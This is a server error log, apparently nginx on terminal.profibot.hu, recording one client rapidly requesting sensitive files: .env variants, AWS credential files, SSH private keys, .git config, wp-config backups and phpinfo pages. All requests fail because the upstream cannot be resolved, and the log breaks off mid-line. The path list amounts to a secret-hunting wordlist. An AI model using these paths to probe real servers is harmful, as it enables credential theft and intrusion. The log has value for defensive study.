+2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /ansible/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/mail.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/smtp.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/database.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /secrets/config.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /private/keys.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env_example HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /core/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /backend HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /local/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /application/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpinfo HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /_profiler/phpinfo HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/settings.ini HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /env/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /new/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /new/.env.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:08 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /new/.env.production HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /new/.env.staging HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /_phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /_profiler/phpinfo/info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /_profiler/phpinfo/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /aws-secret.yaml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /awstats/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /conf/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /cron/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /www/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /docker/app/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /env.backup HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /xampp/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /lara/info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /lara/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /laravel/info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /js/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /laravel/core/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /nginx/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /site/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /xampp/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.docker/laravel/app/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /laravel/.env.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /laravel/.env.production HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /laravel/.env.staging HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /laravel/core/.env.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /laravel/core/.env.production HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /laravel/core/.env.staging HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /main/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /bootstrap/cache/config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /storage/app/private/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /storage/logs/laravel.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /composer.lock HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /server.key HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /dump.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /php5.ini HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:09 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config.php.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /src/app.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /server-info HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /docker.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config.php.save HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /pi.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-config.php.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-config.php.backup HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /aws-credentials.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/info HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config.ini HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /%c0 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.aws/credentials.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.aws/credentials/admin/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.azure-pipelines.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.bitbucket-pipelines.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.bitbucket/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.boto HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.bzr/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.c9/metadata/environment/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.circleci/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.circleci/config.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.dockerignore HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env-db HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.back HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.bkp HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.credentials HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.email HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.hidden HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.hide HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.key HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.mail HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.smtp HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.swp HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:10 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.testing HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.uat HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env_aws HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env_backup HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env_copy HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env_private HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env_secret HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env~ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.git/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.git/config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.github/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.github/workflows/*.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.gitignore HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.gitlab-ci.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.gitlab-ci/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.gitlab/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.hg/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.htaccess HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.idea/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.next/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.npmrc HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.nuxt/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.output/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.phpinfo HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.production HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.pypirc HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.remote HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.ssh/id_rsa HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.ssh/id_rsa.pub HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.svn/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.travis.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.vite/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.vscode/settings.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.well-known/openid-configuration HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.well-known/security.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:11 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /07-accessing-data/begin/vue-heroes/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /07-accessing-data/end/vue-heroes/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /08-routing/begin/vue-heroes/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /08-routing/end/vue-heroes/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /09-managing-state/begin/vue-heroes/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /09-managing-state/end/vue-heroes/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /123.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /3-sequelize/final/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /31_structure_tests/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /?p=info HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /?p=php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /?phpinfo HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /?phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /?phpinfo=1 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:12 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /?q=info HTTP/1.1", host: 